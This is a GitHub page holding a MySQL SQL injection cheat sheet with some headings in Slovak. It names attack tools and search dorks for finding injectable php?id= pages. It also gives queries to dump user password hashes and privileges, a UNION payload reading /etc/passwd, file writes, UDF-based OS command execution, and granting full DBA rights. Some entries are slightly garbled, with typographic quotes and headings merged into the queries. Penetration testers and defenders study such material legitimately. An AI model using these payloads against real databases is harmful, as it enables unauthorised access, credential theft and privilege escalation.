-
Notifications
You must be signed in to change notification settings - Fork 0
/
MySQL SQL Injection Cheat Sheet.sql
121 lines (87 loc) · 4.09 KB
/
MySQL SQL Injection Cheat Sheet.sql
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
-- GUI nástroje:
Havij
TyrantSQL - Treba Python 2.*.* + knižnice
SQL Power Injector
Vega
-- CMD nástroje:
SQLmap
Hashcat
-- Vyhľadávacie dopyty Google/Bing:
PHP/ASP + MySQL/MS SQL Server
php?id=
asp?id=
-- Version
SELECT @@version
-- Comments
SELECT 1; #comment
SELECT /*comment*/1;
-- Current User
SELECT user();
SELECT system_user();
-- List Users
SELECT user FROM mysql.user; -- priv
-- List Password Hashes
SELECT host, user, password FROM mysql.user; -- priv
-- Password Cracker
-- HashCat, John the Ripper will crack MySQL password hashes.
-- List Privileges
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; -- list user privs
SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; -- priv, list user privs
SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges;
-- list privs on databases (schemas)
SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; — list privs on columns
-- List DBA Accounts
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘SUPER’;SELECT host, user FROM mysql.user WHERE Super_priv = ‘Y’; # priv
-- Current Database
SELECT database()
-- List Databases
SELECT schema_name FROM information_schema.schemata; — for MySQL >= v5.0
SELECT distinct(db) FROM mysql.db -- priv
List Columns SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
-- List Tables
SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
-- Find Tables From Column Name
SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username'; -- find table which have a column called 'username'
-- Select Nth Row
SELECT host, user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0
SELECT host, user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0
-- Select Nth Char
SELECT substr('abcd', 3, 1); # returns c
-- Bitwise AND
SELECT 6 & 2; # returns 2
SELECT 6 & 1; # returns 0
-- ASCII Value -> Char
SELECT char(65); # returns A
Char -> ASCII Value SELECT ascii('A'); # returns 65
-- Casting
SELECT cast('1' AS unsigned integer);
SELECT cast('123' AS char);
-- String Concatenation
SELECT CONCAT('A','B'); #returns AB
SELECT CONCAT('A','B','C'); # returns ABC
-- If Statement SELECT if(1=1,'foo','bar'); -- returns 'foo’
-- Case Statement
SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns A
-- Avoiding Quotes
SELECT 0×414243; # returns ABC
-- Time Delay
SELECT BENCHMARK(1000000,MD5('A'));
SELECT SLEEP(5); # >= 5.0.12
-- Make DNS Requests Impossible?
-- Command Execution
If mysqld (<5.0) is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /usr/lib (or similar). The .so file should contain a User Defined Function (UDF). raptor_udf.c explains exactly how you go about this. Remember to compile for the target architecture which may or may not be the same as your attack platform.
-- Local File Access
…’ UNION ALL SELECT LOAD_FILE('/etc/passwd') -- priv, can only read world-readable files.
SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; -- priv, write to file system
-- Hostname, IP Address
SELECT @@hostname;
-- Create Users
CREATE USER test1 IDENTIFIED BY 'pass1'; -- priv
-- Delete Users
DROP USER test1; -- priv
-- Make User DBA
GRANT ALL PRIVILEGES ON *.* TO test1@'%'; -- priv
-- Location of DB files
SELECT @@datadir;
-- Default/System Databases information_schema (>= mysql 5.0)
mysql